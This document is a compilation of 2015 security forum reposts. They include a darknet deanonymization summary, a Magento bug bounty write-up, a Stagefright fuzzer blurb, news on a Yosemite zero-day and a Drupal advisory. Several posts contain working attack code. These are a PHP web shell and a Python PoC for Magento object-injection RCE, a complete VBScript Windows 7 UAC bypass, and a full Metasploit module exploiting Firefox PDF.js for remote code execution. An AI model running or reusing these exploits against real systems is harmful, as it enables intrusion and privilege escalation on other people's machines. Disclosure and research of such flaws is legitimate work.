Conclusion The goal of my research was to show that often deanonymization of a hidden service (or even a network) can be done trivially by applying the same pentest approach as in clearnet. Main difference here is that usually non-critical information disclosure plays much more significant role than for “normal” web applications. To summarize, at least the following easy ways may let researcher deanonymize a darknet service: instant win (server-info, phpinfo, …) status page access (x.x.x.x/x.x.x.x) (un)expected redirect (30x clearnet to darknet) app-level pwnage (missing patches, vulnerabilities in the code, default framework pages…) P.S. If you’re interested in the topic, you may also want to check TheCtulhu’s blog and find decent instructions on configuring nginx server to host a hidden service in a more secure way. Posted by Authorized Attacker Aug 22nd, 2015 9:44 pm Sursa: http://antukh.com/blog/2015/08/22/dark-appsec/

[h=3]Magento Bug Bounty 1 & 2: CSRF to code execution and Post-auth RCE via object injection[/h]After months of procrastination and tons of words of encouragement from a good friend to start this blog I've decided to do so finally and open up with a couple of bug bounties I've been awarded with recently. I was shooting for the top bounties for Magento and landed pretty close to my goal. Bounty #1: CSRF: My initial thought was to check out some of less explored areas of Magento that seemed interesting. Namely, the /downloader/ page which is used to by admins to upload plugins to the Magento store either from a local package or remotely from the Magento Connect marketplace. Upon logging in I attempted to change a few settings and immediately noticed there was no CSRF tokens on any of the requests. I thought of the obvious issue, CSRF an admin and upload a malicious module but there were a couple problems that prevented this. Problem 1: I had no idea what the directory and file structure was like for the MagentoConnect website and googling around didn't lead to much. Solution: Wireshark solves a lot of problems. While running a local copy I just had to find the requests being sent from my server, grab each config file being read, and mimic them on my attackers server. After a bit of back and forth I had managed to properly emulate the community plugin pages layout on my attacker server and create a valid malicious payload. bad.php: <?php system($_GET[cmd]); ?> Problem 2: The process requires multiple POST requests to install from a URL In order for a plugin to be installed from a URL the admin needed to click "install" after the URL was entered and then "proceed" which was sent in 2 POST requests. XHR would have made this a non-issue but there was no CORS header being sent allowing this. We could have used the method described in this awesome blog post but because the "X-Frame-Options" was set to "SAMEORIGIN" it would not have worked. NOTE: As pointed out in the comments by Mr. James Kettle this attack would actually still work even with the X-Frame-Option. However, upon closer inspection the "A=" parameter seems to change when the install actually takes place. If we just adjust our PoC CSRF to POST to that URL instead it seems like we'd be able to install our payload with a single click from an admin. And it worked! The bounty awarded for this bug was $9000. Timeline: 11/17/2014 - Bug reported via the Ebay Inc. Bug Bounty portal 02/??/2015 - Report was closed 02/10/2015 - Created another bug report via the Ebay Inc. Bug Bounty portal 02/10/2015 - Request for more info by Ebay 02/23/2015 - Request for assistance with setting up PoC page 03/04/2015 - More back forth with the engineer 04/03/2015 - Initial payment received 06/03/2015 - Final payment received 07/07/2015 - Patch is pushed Bounty #2 PHP Object injection: You may or may not have seen this one posted before by a much more skilled researcher and writer named Johannes Dahse, the author of the popular PHP source code analysis tool RIPS. If you have not I highly suggest reading his writeup here instead as it'll be an actual explanation with more content. I likely only reported the bug a few days earlier so kudos to him. The bounty awarded for this issue was $2500. Timeline: 11/21/2014 - Bug reported via the Ebay Inc. Bug Bounty portal 11/24/2014 - Patched silently in 1.9.1.0 12/18/2014 - Final payment received PoC sent to PayPal: #!/usr/bin/python # Magento PoC for post auth php object injection # pip install mechanize || easy_install mechanize # Author: @Ebrietas0 || http://ebrietas0.blogspot.com import sys import re import base64 from hashlib import md5 import mechanize def usage(): print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"" sys.exit() if len(sys.argv) != 3: usage() # Command-line args target = sys.argv[1] arg = sys.argv[2] # Config. username = '' password = '' php_function = 'system' # Note: we can only pass 1 argument to the function install_date = 'Sat, 15 Nov 2014 20:27:57 +0000' # This needs to be the exact date from /app/etc/local.xml # POP chain to pivot into call_user_exec payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \ '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \ 'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \ 'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \ '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \ ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function, len(arg), arg) # Setup the mechanize browser and options br = mechanize.Browser() br.set_proxies({"http": "localhost:8080"}) br.set_handle_robots(False) request = br.open(target) br.select_form(nr=0) br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control. br.form.fixup() br['login[username]'] = username br['login[password]'] = password br.method = "POST" request = br.submit() content = request.read() url = re.search("ajaxBlockUrl = \'(.*)\'", content) url = url.group(1) key = re.search("var FORM_KEY = '(.*)'", content) key = key.group(1) request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key) tunnel = re.search("src=\"(.*)\?ga=", request.read()) tunnel = tunnel.group(1) payload = base64.b64encode(payload) gh = md5(payload + install_date).hexdigest() exploit = tunnel + '?ga=' + payload + '&h=' + gh try: request = br.open(exploit) except (mechanize.HTTPError, mechanize.URLError) as e: print e.read() Posted by Ebrietas Sursa: http://ebrietas0.blogspot.ro/2015/08/magento-bug-bounty-1-2-csrf-to-code.html

[h=1]MFFA - Media Fuzzing Framework for Android (Stagefright fuzzer)[/h] [h=2]Project overview[/h] The main idea behind this project is to create corrupt but structurally valid media files, direct them to the appropriate software components in Android to be decoded and/or played and monitor the system for potential issues (i.e system crashes) that may lead to exploitable vulnerabilities. Custom developed Python scripts are used to send the malformed data across a distributed infrastructure of Android devices, log the findings and monitor for possible issues, in an automated manner. The actual decoding of the media files on the Android devices is done using the Stagefright command line interface. The results are sorted out, in an attempt to find only the unique issues, using a custom built triage mechanism. Link: https://github.com/fuzzing/MFFA

NU instalati aceste update-uri: 1. https://support.microsoft.com/en-us/kb/3075249 2. https://support.microsoft.com/en-us/kb/3080149 Scopul lor e acelasi ca pe Windows 10 - sa trimita diverse informatii catre serverele Microsoft.

[h=1]UAC Bypass Vulnerability in Windows Script Host[/h] The Windows Script Host executables suffer from a vulnerability due to a missing embedded manifest. This allows the script host executables to be copied to another system directory and allows a manifest to be applied to the executable. This manifest allows to execute the script host with administrative rights. Both ZDI and Microsoft are aware of this issue, expectedly ZDI didn't accept the admission because it's not a remote vulnerability. Surprisingly Microsoft didn't accept the vulnerability because "UAC isn't considered a security boundary". Only Windows 7 is vulnerable, Windows 8 has a embedded manifest and Windows 10 is untested. Option Explicit Dim HOST_MANIFEST: HOST_MANIFEST = _ "<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>" & vbCrLf & _ "<assembly xmlns=""urn:schemas-microsoft-com:asm.v1""" & vbCrLf & _ " xmlns:asmv3=""urn:schemas-microsoft-com:asm.v3""" & vbCrLf & _ " manifestVersion=""1.0"">" & vbCrLf & _ " <asmv3:trustInfo>" & vbCrLf & _ " <security>" & vbCrLf & _ " <requestedPrivileges>" & vbCrLf & _ " <requestedExecutionLevel level=""RequireAdministrator"" uiAccess=""false""/>" & vbCrLf & _ " </requestedPrivileges>" & vbCrLf & _ " </security>" & vbCrLf & _ " </asmv3:trustInfo>" & vbCrLf & _ " <asmv3:application>" & vbCrLf & _ " <asmv3:windowsSettings xmlns=""http://schemas.microsoft.com/SMI/2005/WindowsSettings"">" & vbCrLf & _ " <autoElevate>true</autoElevate>" & vbCrLf & _ " <dpiAware>true</dpiAware>" & vbCrLf & _ " </asmv3:windowsSettings>" & vbCrLf & _ " </asmv3:application>" & vbCrLf & _ "</assembly>" Function CanBypass() Dim KEY_NAME: KEY_NAME = _ "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\" & _ "Policies\System\ConsentPromptBehaviorAdmin" Dim oWs: Set oWs = CreateObject("WScript.Shell") CanBypass = Not CBool(oWs.RegRead(KEY_NAME) And 2) End Function Sub Copy(ByVal sSource, ByVal sTarget) Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject") Dim oWs: Set oWs = CreateObject("WScript.Shell") Dim sTempFile: sTempFile = GetTempFilename() oWs.Run "makecab """ & sSource & """ """ & sTempFile & """", 0, True oWs.Run "wusa """ & sTempFile & """ /extract:" & sTarget, 0, True oFso.DeleteFile sTempFile End Sub Sub Elevate() Const WINDIR = "%windir%" If Not CanBypass() Then Message "User will get warnings...", vbInformation ' Exit Sub End If Dim oWs: Set oWs = CreateObject("WScript.Shell") Dim sPath: sPath = Left(WScript.ScriptFullName, _ InStrRev(WScript.ScriptFullName, "\")) Dim sHost: sHost = Right(WScript.FullName, 11) Dim sManifest: sManifest = sPath & sHost & ".manifest" Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject") Dim oStream: Set oStream = oFso.CreateTextFile(sManifest) oStream.Write HOST_MANIFEST oStream.Close Copy sManifest, WINDIR Copy WScript.FullName, WINDIR oWs.Run WINDIR & "\" & sHost & " """ & WScript.ScriptFullName & """ /RESTART" oFso.DeleteFile sManifest End Sub Function GetTempFilename() Const vbTemporaryFolder = 2 Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject") Dim sTempFolder: sTempFolder = oFso.GetSpecialFolder(vbTemporaryFolder) GetTempFilename = oFso.BuildPath(sTempFolder, oFso.GetTempName()) End Function Function HasAdmin() Const VALUE = "RandomValue" Const KEYNAME = "HKLM\SOFTWARE\Microsoft\RandomKey" On Error Resume Next : Err.Clear Dim oWs: Set oWs = CreateObject("WScript.Shell") oWs.RegWrite KEYNAME, VALUE Call oWs.RegRead(KEYNAME) oWs.RegDelete KEYNAME HasAdmin = CBool(Err.Number = 0) End Function Function Message(ByVal sMessage, ByVal iFlags) Message = MsgBox(sMessage, vbSystemModal Or iFlags, WScript.ScriptName) End Function Sub RunAsAdmin() If HasAdmin() Then Message "Elevated to admin, ...", vbInformation Else Message "Failed... no admin", vbExclamation End If End Sub If WScript.Arguments.Named.Exists("RESTART") Then RunAsAdmin ElseIf HasAdmin() Then Message "U Wot M8? This is a elevation test and we're already admin!", vbCritical Else Elevate End If Sursa: https://github.com/Vozzie/uacscript

Firefox PDF.js Privileged Javascript Injection Authored by temp66, joev, Marius Mlynski | Site metasploit.com This Metasploit module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) super(update_info(info, 'Name' => 'Firefox PDF.js Privileged Javascript Injection', 'Description' => %q{ This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability. }, 'Author' => [ 'Unknown', # PDF.js injection code was taken from a 0day 'Marius Mlynski', # discovery and pwn2own exploit 'joev' # copypasta monkey, CVE-2015-0802 ], 'DisclosureDate' => "Mar 31 2015", 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0816'], # pdf.js can load chrome:// ['CVE', '2015-0802'] # can access messageManager property in chrome window ], 'Targets' => [ [ 'Universal (Javascript XPCOM Shell)', { 'Platform' => 'firefox', 'Arch' => ARCH_FIREFOX } ], [ 'Native Payload', { 'Platform' => %w{ java linux osx solaris win }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(35, 36) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ]) ], self.class) end def on_request_exploit(cli, request, target_info) print_status('Sending exploit...') send_response_html(cli, html) end def html "<!doctype html><html><body>#{datastore['CONTENT'] || default_html}"+ "<script>#{js}</script></body></html>" end def default_html "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected." end def js key = Rex::Text.rand_text_alpha(5 + rand(12)) frame = Rex::Text.rand_text_alpha(5 + rand(12)) r = Rex::Text.rand_text_alpha(5 + rand(12)) opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin <<-EOJS function xml2string(obj) { return new XMLSerializer().serializeToString(obj); } function __proto(obj) { return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__; } function get(path, callback, timeout, template, value) { callback = _(callback); if (template && value) { callback = callback.replace(template, value); } js_call1 = 'javascript:' + _(function() { try { done = false; window.onclick = function() { if (done) { return; } done = true; q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px"); setTimeout(function(){ q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>'; setTimeout(function(){ var opts = #{JSON.unparse(opts)}; var key = opts['#{key}']; q.messageManager.loadFrameScript('data:,'+key, false); setTimeout(function(){ q.close(); }, 100) }, 100) }, 100); } } catch (e) { history.back(); } undefined; }, "%url%", path); js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined'; sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l = p.__lookupSetter__.call(i2.contentWindow, 'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call1); })); setTimeout((function() { sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l = p.__lookupSetter__.call(i2.contentWindow, 'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call2); })); }), timeout); } function get_data(obj) { data = null; try { data = obj.document.documentElement.innerHTML; if (data.indexOf('dirListing') < 0) { throw new Error(); } } catch (e) { if (this.document instanceof XMLDocument) { data = xml2string(this.document); } else { try { if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') { data = this.document.body.firstChild.textContent; } else { throw new Error(); } } catch (e) { try { if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {; return null; } else { throw new Error(); } } catch (e) { ;; } } } } return data; } function _(s, template, value) { s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1]; s = s.substring(0, s.length - 1); if (template && value) { s = s.replace(template, value); } s += __proto; s += xml2string; s += get_data; s = s.replace(/\\s\\/\\/.*\\n/g, ""); s = s + ";undefined"; return s; } function get_sandbox_context() { if (window.my_win_id == null) { for (var i = 0; i < 20; i++) { try { if (window[i].location.toString().indexOf("view-source:") != -1) { my_win_id = i; break; } } catch (e) {} } }; if (window.my_win_id == null) return; clearInterval(sandbox_context_i); object.data = 'view-source:' + blobURL; window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,'; object.data = 'data:text/html,<'+'html/>'; window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+ '"position:absolute; left:-9999px;" onload = "'+_(function(){ window.wrappedJSObject.sandboxContext=(function(cmd) { with(importFunction.constructor('return this')()) { return eval(cmd); } }); }) + '"/>'); } var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;'; var i = document.createElement("iframe"); i.id = "i"; i.style=HIDDEN; i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>"; document.documentElement.appendChild(i); i.onload = function() { if (this.contentDocument.styleSheets.length > 0) { var i2 = document.createElement("iframe"); i2.id = "i2"; i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;'; i2.height = window.innerHeight+'px'; i2.width = window.innerWidth+'px'; i2.src = "data:application/pdf,"; document.documentElement.appendChild(i2); pdfBlob = new Blob([''], { type: 'application/pdf' }); blobURL = URL.createObjectURL(pdfBlob); object = document.createElement('object'); object.style=HIDDEN; object.data = 'data:application/pdf,'; object.onload = (function() { sandbox_context_i = setInterval(get_sandbox_context, 200); object.onload = null; object.data = 'view-source:' + location.href; return; }); document.documentElement.appendChild(object); } else { this.contentWindow.location.reload(); } } document.body.style.height = window.innerHeight+'px'; var kill = setInterval(function() { if (window.sandboxContext) { var f = "chrome://browser/content/browser.xul"; get(f, function() {}, 0, "%URL%", f); clearInterval(kill); } else { return; } },20); EOJS end end Sursa: https://packetstormsecurity.com/files/133271

Check this: original_function = (LPVOID)GetProcAddress(GetModuleHandle("chrome.dll"),"SSL_Write"); It's wrong. Chrome.dll does not export that function. Binary find it.

Zero-day flaw found in Mac OS X Yosemite security update by Jason Murdock 18 Aug 2015 An Italian teenager has discovered a previously unknown zero-day vulnerability in Apple's Mac OS X platform that could be exploited by hackers to allow privileged access to Mac systems. A proof-of-concept has been released by Luca Todesco, 18, who said the exploit uses bugs to corrupt the memory in the operating system that can then be used to access the system root shell. The flaw, dubbed 'tpwn', is said to affect all versions of Yosemite, including the recently patched 10.10.5, but reportedly does not affect El Capitan. Details of the flaw have been published on GitHub, and Todesco has faced criticism for contacting Apple about the problem only a few hours before publishing his findings. Todesco said on Twitter that he has received significant condemnation on social media after publishing the code without giving Apple enough time to release a security fix. This is kinda getting out of proportion. Best outcome for me would have simply been to stay quiet. I had reasons to drop it the other day. — Luca Todesco (@qwertyoruiop) August 17, 2015 Todesco has released a third-party patch for the vulnerability called NullGuard which is included in the material published to GitHub, but it is not considered an official release and is not certified by Apple. NULLGuard - Fixes tpwn & prevents NULL page mapping, rendering many bugs unexploitable. http://github.com/kpwn/NULLGuard — Luca Todesco (@qwertyoruiop) August 16, 2015 The news comes after Apple recently rolled out a patch for OS X 10.10.5 to fix a ‘print to file' vulnerability discovered by German researcher Stefan Esser that allowed hackers to inject malware and adware into the Mac operating system without needing a password. A separate research team discovered another major security flaw called Thunderstrike 2 that targets Mac firmware. Thunderstrike 2 was revealed at the 2015 Black Hat security conference in Las Vegas and can infect a MacBook via a phishing email that can then spread to any other hardware with which it comes into contact. V3 has contacted Apple about whether the firm plans to release a patch for the 'tpwn' flaw but had not received a reply at the time of publication. Sursa: http://www.v3.co.uk/v3-uk/news/2422517/zero-day-flaw-found-in-mac-os-x-yosemite-security-update

BinNavi Copyright 2015 Google Inc. Disclaimer: This is not an official Google product (experimental or otherwise), it is just code that happens to be owned by Google. Introduction BinNavi is a binary analysis IDE - an environment that allows users to inspect, navigate, edit, and annotate control-flow-graphs of disassembled code, do the same for the callgraph of the executable, collect and combine execution traces, and generally keep track of analysis results among a group of analysts. Link: https://github.com/google/binnavi

Drupal 6.37 and 7.39 released, critical vulnerabilities addressed Robert Abel, Content Coordinator Open source content management (CMS) platform Drupal has issued security patches to address several critical vulnerabilities affecting Drupal 6 and 7. According to the Wednesday advisory, versions of Drupal prior to 6.37 and 7.39 contain three vulnerabilities, including a cross-site scripting bug in the Autocomplete system, a cross-site request forgery bug in Form API, and an information disclosure flaw in Access system. The cross-site forgery vulnerability located in Form API “could allow a malicious user to upload files to the site under another user's account,” the advisory said. Vulnerable versions of Drupal 7 are affected by two additional issues, including a cross-site scripting bug in the Ajax system and a SQL injection vulnerability in Database API. The SQL injection vulnerability can enable a “user with elevated permissions to inject malicious code in SQL comments,” the advisory said. Sursa: Drupal 6.37 and 7.39 released, critical vulnerabilities addressed - SC Magazine